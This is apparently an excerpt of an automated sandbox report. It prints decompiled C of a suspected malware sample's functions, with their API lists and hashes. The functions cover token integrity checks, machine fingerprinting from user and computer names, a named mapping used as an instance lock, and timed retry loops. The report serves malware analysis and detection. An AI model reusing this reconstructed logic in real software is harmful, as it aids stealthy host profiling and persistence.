                                                  • Instruction Fuzzy Hash: 09816D76D00109EFDF10CFA5EC48AEEBBB9FB94300F114166E505E6250EB35AA85CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E04F483B7(char _a4, void* _a8) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				char _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				void* _v44;
                                                  				void** _t33;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				void** _t44;
                                                  				intOrPtr* _t47;
                                                  				char _t48;
                                                  
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v20 = _a4;
                                                  				_t48 = 0;
                                                  				_v16 = 0;
                                                  				_a4 = 0;
                                                  				_v44 = 0x18;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v28 = 0;
                                                  				_v24 = 0;
                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                  					_t33 =  &_v8;
                                                  					__imp__(_v12, 8, _t33);
                                                  					if(_t33 >= 0) {
                                                  						_t47 = __imp__;
                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                  						_t44 = E04F42049(_a4);
                                                  						if(_t44 != 0) {
                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                  							if(_t40 >= 0) {
                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                  								_t48 = 1;
                                                  							}
                                                  							E04F49039(_t44);
                                                  						}
                                                  						NtClose(_v8); // executed
                                                  					}
                                                  					NtClose(_v12);
                                                  				}
                                                  				return _t48;
                                                  			}

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04F483FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04F48411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F4842D
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F4844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04F48457
                                                  • NtClose.NTDLL(?), ref: 04F48469
                                                  • NtClose.NTDLL(00000000), ref: 04F48473
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 1a500cdd961752f7f4b6e2683622d80f7f5fb4961b3a949c6e4e496879a91f15
                                                  • Instruction ID: 134937f1a62c161092e5ee78bc84d6e0ab6559cfe8ceb9ea0de9a1d328d3f56e
                                                  • Opcode Fuzzy Hash: 1a500cdd961752f7f4b6e2683622d80f7f5fb4961b3a949c6e4e496879a91f15
                                                  • Instruction Fuzzy Hash: C32136B690021CFBDB01AF95DC44ADEBFBDEF98780F114022FA00F6120DB759A419BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 83%
                                                  			E04F46786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				struct %anon52 _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v32;
                                                  				union _LARGE_INTEGER _v36;
                                                  				intOrPtr _v40;
                                                  				void* _v44;
                                                  				void _v88;
                                                  				char _v92;
                                                  				struct %anon52 _t46;
                                                  				intOrPtr _t51;
                                                  				long _t53;
                                                  				void* _t54;
                                                  				struct %anon52 _t60;
                                                  				long _t64;
                                                  				signed int _t65;
                                                  				void* _t68;
                                                  				void* _t70;
                                                  				signed int _t71;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t76;
                                                  				void** _t78;
                                                  				void* _t80;
                                                  
                                                  				_t73 = __edx;
                                                  				_v92 = 0;
                                                  				memset( &_v88, 0, 0x2c);
                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                  				_v44 = _t46;
                                                  				if(_t46 == 0) {
                                                  					_v8.LowPart = GetLastError();
                                                  				} else {
                                                  					_push(0xffffffff);
                                                  					_push(0xff676980);
                                                  					_push(0);
                                                  					_push( *0x4f4d240);
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					L04F4B0C8();
                                                  					_v36.LowPart = _t46;
                                                  					_v32 = _t73;
                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  					_t51 =  *0x4f4d26c; // 0x31c
                                                  					_v40 = _t51;
                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  					_v8.LowPart = _t53;
                                                  					if(_t53 == 0) {
                                                  						if(_a8 != 0) {
                                                  							L4:
                                                  							 *0x4f4d24c = 5;
                                                  						} else {
                                                  							_t68 = E04F473FD(_t73); // executed
                                                  							if(_t68 != 0) {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  						_v12 = 0;
                                                  						L6:
                                                  						L6:
                                                  						if(_v12 == 1 && ( *0x4f4d260 & 0x00000001) == 0) {
                                                  							_v12 = 2;
                                                  						}
                                                  						_t71 = _v12;
                                                  						_t58 = _t71 << 4;
                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                  						_t72 = _t71 + 1;
                                                  						_v24 = _t71 + 1;
                                                  						_t60 = E04F48504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                  						_v8.LowPart = _t60;
                                                  						if(_t60 != 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t65 = _v24;
                                                  						_t90 = _t65 - 3;
                                                  						_v12 = _t65;
                                                  						if(_t65 != 3) {
                                                  							goto L6;
                                                  						} else {
                                                  							_v8.LowPart = E04F43BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                  						}
                                                  						goto L12;
                                                  						L17:
                                                  						__eflags = _t60 - 0x10d2;
                                                  						if(_t60 != 0x10d2) {
                                                  							_push(0xffffffff);
                                                  							_push(0xff676980);
                                                  							_push(0);
                                                  							_push( *0x4f4d244);
                                                  							goto L21;
                                                  						} else {
                                                  							__eflags =  *0x4f4d248; // 0x0
                                                  							if(__eflags == 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t60 = E04F4A1B0();
                                                  								_push(0xffffffff);
                                                  								_push(0xdc3cba00);
                                                  								_push(0);
                                                  								_push( *0x4f4d248);
                                                  								L21:
                                                  								L04F4B0C8();
                                                  								_v36.LowPart = _t60;
                                                  								_v32 = _t76;
                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  								__eflags = _t64;
                                                  								_v8.LowPart = _t64;
                                                  								if(_t64 == 0) {
                                                  									goto L6;
                                                  								} else {
                                                  									goto L12;
                                                  								}
                                                  							}
                                                  						}
                                                  						L25:
                                                  					}
                                                  					L12:
                                                  					_t78 =  &_v92;
                                                  					_t70 = 3;
                                                  					do {
                                                  						_t54 =  *_t78;
                                                  						if(_t54 != 0) {
                                                  							HeapFree( *0x4f4d238, 0, _t54);
                                                  						}
                                                  						_t78 =  &(_t78[4]);
                                                  						_t70 = _t70 - 1;
                                                  					} while (_t70 != 0);
                                                  					CloseHandle(_v44);
                                                  				}
                                                  				return _v8;
                                                  				goto L25;
                                                  			}
                                                  0x04f46880
                                                  0x04f46880
                                                  0x00000000
                                                  0x04f468ae
                                                  0x04f468ae
                                                  0x04f468b3
                                                  0x04f468d2
                                                  0x04f468d4
                                                  0x04f468d9
                                                  0x04f468da
                                                  0x00000000
                                                  0x04f468b5
                                                  0x04f468b5
                                                  0x04f468bb
                                                  0x00000000
                                                  0x04f468bd
                                                  0x04f468bd
                                                  0x04f468c2
                                                  0x04f468c4
                                                  0x04f468c9
                                                  0x04f468ca
                                                  0x04f468e0
                                                  0x04f468e0
                                                  0x04f468e8
                                                  0x04f468f3
                                                  0x04f468f6
                                                  0x04f46901
                                                  0x04f46903
                                                  0x04f46905
                                                  0x04f46908
                                                  0x00000000
                                                  0x04f4690e
                                                  0x00000000
                                                  0x04f4690e
                                                  0x04f46908
                                                  0x04f468bb
                                                  0x00000000
                                                  0x04f468b3
                                                  0x04f46883
                                                  0x04f46885
                                                  0x04f46888
                                                  0x04f46889
                                                  0x04f46889
                                                  0x04f4688d
                                                  0x04f46897
                                                  0x04f46897
                                                  0x04f4689d
                                                  0x04f468a0
                                                  0x04f468a0
                                                  0x04f468a6
                                                  0x04f468a6
                                                  0x04f46923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 04F4679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F467A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F467CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04F467E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F46801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F46897
                                                  • CloseHandle.KERNEL32(?), ref: 04F468A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04F468E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04F42417,?), ref: 04F468F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F46901
                                                    • Part of subcall function 04F473FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070793C0,?,00000000,30314549,00000014,004F0053,0707937C), ref: 04F474E9
                                                    • Part of subcall function 04F473FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F46814), ref: 04F474FB
                                                  • GetLastError.KERNEL32 ref: 04F46913
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 872fbacf7494240db0f4407910a12ffc9ad027a91f9dcf56a8445176831f5a88
                                                  • Instruction ID: f2d2294cd66700ee381de8fa2760609ec98f83eea027f6d86302558a4cd7fc05
                                                  • Opcode Fuzzy Hash: 872fbacf7494240db0f4407910a12ffc9ad027a91f9dcf56a8445176831f5a88
                                                  • Instruction Fuzzy Hash: 51510D75D01229ABEF10DFD5EC449EEBFB8EF85364F104515E411E2190DB78AA45CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04F41B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                  				intOrPtr _v8;
                                                  				struct _FILETIME* _v12;
                                                  				short _v56;
                                                  				struct _FILETIME* _t12;
                                                  				intOrPtr _t13;
                                                  				void* _t17;
                                                  				void* _t21;
                                                  				intOrPtr _t27;
                                                  				long _t28;
                                                  				void* _t30;
                                                  
                                                  				_t27 = __edx;
                                                  				_t12 =  &_v12;
                                                  				GetSystemTimeAsFileTime(_t12);
                                                  				_push(0x192);
                                                  				_push(0x54d38000);
                                                  				_push(_v8);
                                                  				_push(_v12);
                                                  				L04F4B0C2();
                                                  				_push(_t12);
                                                  				_v12 = _t12;
                                                  				_t13 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t5 = _t13 + 0x4f4e862; // 0x7078e0a
                                                  				_t6 = _t13 + 0x4f4e59c; // 0x530025
                                                  				_push(0x16);
                                                  				_push( &_v56);
                                                  				_v8 = _t27;
                                                  				L04F4AD5A();
                                                  				_t17 = CreateFileMappingW(0xffffffff, 0x4f4d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                  				_t30 = _t17;
                                                  				if(_t30 == 0) {
                                                  					_t28 = GetLastError();
                                                  				} else {
                                                  					if(GetLastError() == 0xb7) {
                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                  						if(_t21 == 0) {
                                                  							_t28 = GetLastError();
                                                  							if(_t28 != 0) {
                                                  								goto L6;
                                                  							}
                                                  						} else {
                                                  							 *_a4 = _t30;
                                                  							 *_a8 = _t21;
                                                  							_t28 = 0;
                                                  						}
                                                  					} else {
                                                  						_t28 = 2;
                                                  						L6:
                                                  						CloseHandle(_t30);
                                                  					}
                                                  				}
                                                  				return _t28;
                                                  			}

                                                  0x04f41b2f
                                                  0x04f41b37
                                                  0x04f41b3b
                                                  0x04f41b41
                                                  0x04f41b46
                                                  0x04f41b4b
                                                  0x04f41b4e
                                                  0x04f41b51
                                                  0x04f41b56
                                                  0x04f41b57
                                                  0x04f41b5a
                                                  0x04f41b5f
                                                  0x04f41b66
                                                  0x04f41b70
                                                  0x04f41b72
                                                  0x04f41b73
                                                  0x04f41b76
                                                  0x04f41b92
                                                  0x04f41b98
                                                  0x04f41b9c
                                                  0x04f41bea
                                                  0x04f41b9e
                                                  0x04f41bab
                                                  0x04f41bbb
                                                  0x04f41bc3
                                                  0x04f41bd5
                                                  0x04f41bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x04f41bc5
                                                  0x04f41bc8
                                                  0x04f41bcd
                                                  0x04f41bcf
                                                  0x04f41bcf
                                                  0x04f41bad
                                                  0x04f41baf
                                                  0x04f41bdb
                                                  0x04f41bdc
                                                  0x04f41bdc
                                                  0x04f41bab
                                                  0x04f41bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04F422EA,?,?,4D283A53,?,?), ref: 04F41B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04F41B51
                                                  • _snwprintf.NTDLL ref: 04F41B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,04F4D2A8,00000004,00000000,00001000,?), ref: 04F41B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04F422EA,?,?,4D283A53), ref: 04F41BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04F41BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04F422EA,?,?), ref: 04F41BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04F422EA,?,?,4D283A53), ref: 04F41BE4
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 4fa37f45b04cf65b4f870f49f8869efb0ffddca83711e07258a613a6657a518f
                                                  • Instruction ID: 0d7a518f037109807e84ff1cd740a9d6adf71bd4ba6482f9d91a169787b780f5
                                                  • Opcode Fuzzy Hash: 4fa37f45b04cf65b4f870f49f8869efb0ffddca83711e07258a613a6657a518f
                                                  • Instruction Fuzzy Hash: 43210576A01208BBD721DBA8DD09F8A3BB8EFC4710F154161F605E7290EF74E942CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04F46A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                  				struct _FILETIME _v12;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t18;
                                                  				signed int _t19;
                                                  				unsigned int _t23;
                                                  				void* _t26;
                                                  				signed int _t33;
                                                  
                                                  				_t26 = __edx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                  				 *0x4f4d238 = _t10;
                                                  				if(_t10 != 0) {
                                                  					 *0x4f4d1a8 = GetTickCount();
                                                  					_t12 = E04F48F10(_a4);
                                                  					if(_t12 == 0) {
                                                  						do {
                                                  							GetSystemTimeAsFileTime( &_v12);
                                                  							_t14 = SwitchToThread();
                                                  							_t23 = _v12.dwHighDateTime;
                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                  							_push(0);
                                                  							_push(9);
                                                  							_push(_t23 >> 7);
                                                  							_push(_t16);
                                                  							L04F4B226();
                                                  							_t33 = _t14 + _t16;
                                                  							_t18 = E04F47E03(_a4, _t33);
                                                  							_t19 = 2;
                                                  							_t25 = _t33;
                                                  							Sleep(_t19 << _t33); // executed
                                                  						} while (_t18 == 1);
                                                  						if(E04F46B96(_t25) != 0) {
                                                  							 *0x4f4d260 = 1; // executed
                                                  						}
                                                  						_t12 = E04F4225B(_t26); // executed
                                                  					}
                                                  				} else {
                                                  					_t12 = 8;
                                                  				}
                                                  				return _t12;
                                                  			}

                                                  0x04f46a56
                                                  0x04f46a5c
                                                  0x04f46a5d
                                                  0x04f46a69
                                                  0x04f46a71
                                                  0x04f46a76
                                                  0x04f46a86
                                                  0x04f46a8b
                                                  0x04f46a92
                                                  0x04f46a94
                                                  0x04f46a99
                                                  0x04f46a9f
                                                  0x04f46aa5
                                                  0x04f46aaf
                                                  0x04f46ab3
                                                  0x04f46ab5
                                                  0x04f46aba
                                                  0x04f46abb
                                                  0x04f46abc
                                                  0x04f46ac1
                                                  0x04f46ac7
                                                  0x04f46ad0
                                                  0x04f46ad1
                                                  0x04f46ad6
                                                  0x04f46adc
                                                  0x04f46ae8
                                                  0x04f46aea
                                                  0x04f46aea
                                                  0x04f46af4
                                                  0x04f46af4
                                                  0x04f46a78
                                                  0x04f46a7a
                                                  0x04f46a7a
                                                  0x04f46afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F46A69
                                                  • GetTickCount.KERNEL32 ref: 04F46A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04F4807D,?), ref: 04F46A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F46A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04F46ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F46AD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID: w6Q
                                                  • API String ID: 507476733-999249872
                                                  • Opcode ID: 016dd495ccd6dbd3e9efbaf9e411c833866ccf6a45eb9dd679e762bf9a3e62f0
                                                  • Instruction ID: 9f7e313fedf531cc1ea35640d0720de49e2d5315ed51b52387c160cc7c8c74df
                                                  • Opcode Fuzzy Hash: 016dd495ccd6dbd3e9efbaf9e411c833866ccf6a45eb9dd679e762bf9a3e62f0
                                                  • Instruction Fuzzy Hash: A811C276A00204AFF724AB78EC09B1A3F98DBD5750F004529F904C62C0EEB8FD518662
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 96 4f4269c-4f426b0 97 4f426b2-4f426b7 96->97 98 4f426ba-4f426cc call 4f46b43 96->98 97->98 101 4f42720-4f4272d 98->101 102 4f426ce-4f426de GetUserNameW 98->102 104 4f4272f-4f42746 GetComputerNameW 101->104 103 4f426e0-4f426f0 RtlAllocateHeap 102->103 102->104 103->104 105 4f426f2-4f426ff GetUserNameW 103->105 106 4f42784-4f427a6 104->106 107 4f42748-4f42759 RtlAllocateHeap 104->107 108 4f42701-4f4270d call 4f42496 105->108 109 4f4270f-4f4271e HeapFree 105->109 107->106 110 4f4275b-4f42764 GetComputerNameW 107->110 108->109 109->104 112 4f42775-4f4277e HeapFree 110->112 113 4f42766-4f42772 call 4f42496 110->113 112->106 113->112
                                                  C-Code - Quality: 96%
                                                  			E04F4269C(char __eax, signed int* __esi) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v28;
                                                  				long _t34;
                                                  				signed int _t39;
                                                  				long _t50;
                                                  				char _t59;
                                                  				intOrPtr _t61;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				signed int* _t64;
                                                  				char _t65;
                                                  				intOrPtr* _t67;
                                                  				void* _t68;
                                                  				signed int* _t69;
                                                  
                                                  				_t69 = __esi;
                                                  				_t65 = __eax;
                                                  				_v8 = 0;
                                                  				_v12 = __eax;
                                                  				if(__eax == 0) {
                                                  					_t59 =  *0x4f4d270; // 0xd448b889
                                                  					_v12 = _t59;
                                                  				}
                                                  				_t64 = _t69;
                                                  				E04F46B43( &_v12, _t64);
                                                  				if(_t65 != 0) {
                                                  					 *_t69 =  *_t69 ^  *0x4f4d278 ^ 0x4c0ca0ae;
                                                  				} else {
                                                  					GetUserNameW(0,  &_v8); // executed
                                                  					_t50 = _v8;
                                                  					if(_t50 != 0) {
                                                  						_t62 = RtlAllocateHeap( *0x4f4d238, 0, _t50 + _t50);
                                                  						if(_t62 != 0) {
                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                  								_t63 = _t62;
                                                  								 *_t69 =  *_t69 ^ E04F42496(_v8 + _v8, _t63);
                                                  							}
                                                  							HeapFree( *0x4f4d238, 0, _t62);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t61 = __imp__;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				GetComputerNameW(0,  &_v8);
                                                  				_t34 = _v8;
                                                  				if(_t34 != 0) {
                                                  					_t68 = RtlAllocateHeap( *0x4f4d238, 0, _t34 + _t34);
                                                  					if(_t68 != 0) {
                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                  							_t63 = _t68;
                                                  							_t69[3] = _t69[3] ^ E04F42496(_v8 + _v8, _t63);
                                                  						}
                                                  						HeapFree( *0x4f4d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				asm("cpuid");
                                                  				_t67 =  &_v28;
                                                  				 *_t67 = 1;
                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                  				 *(_t67 + 8) = _t63;
                                                  				 *(_t67 + 0xc) = _t64;
                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                  				_t69[1] = _t69[1] ^ _t39;
                                                  				return _t39;
                                                  			}

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04F426D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F426EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04F426F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04F423D9), ref: 04F42718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F4273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F42753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F42760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04F423D9), ref: 04F4277E
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 7b9f0cea22b53e97efd77e3efec4bab9f68d0f1580d002ebbf75793c75005098
                                                  • Instruction ID: 977193a164fd2bcb8818402519a3d1cc6290379c7266c31b211df99bba364a77
                                                  • Opcode Fuzzy Hash: 7b9f0cea22b53e97efd77e3efec4bab9f68d0f1580d002ebbf75793c75005098
                                                  • Instruction Fuzzy Hash: 7331EA75A00209EFEB11DF69EC80A6EBBF9EF98350B124079E505D7250DF74EE469B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E04F4924F(long* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void _v16;
                                                  				long _v20;
                                                  				int _t33;
                                                  				void* _t46;
                                                  
                                                  				_v16 = 1;
                                                  				_v20 = 0x2000;
                                                  				if( *0x4f4d25c > 5) {
                                                  					_v16 = 0;
                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                  						_v8 = 0;
                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                  						if(_v8 != 0) {
                                                  							_t46 = E04F42049(_v8);
                                                  							if(_t46 != 0) {
                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                  								if(_t33 != 0) {
                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                  								}
                                                  								E04F49039(_t46);
                                                  							}
                                                  						}
                                                  						CloseHandle(_v12);
                                                  					}
                                                  				}
                                                  				 *_a4 = _v20;
                                                  				return _v16;
                                                  			}

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04F49281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04F492A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04F492B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 04F49301
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04F492D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04F492DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04F492EC
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: f28a9215a9a1f248030c4780d559eeef4d7e06867064dcf1b16b260ee4c1cccd
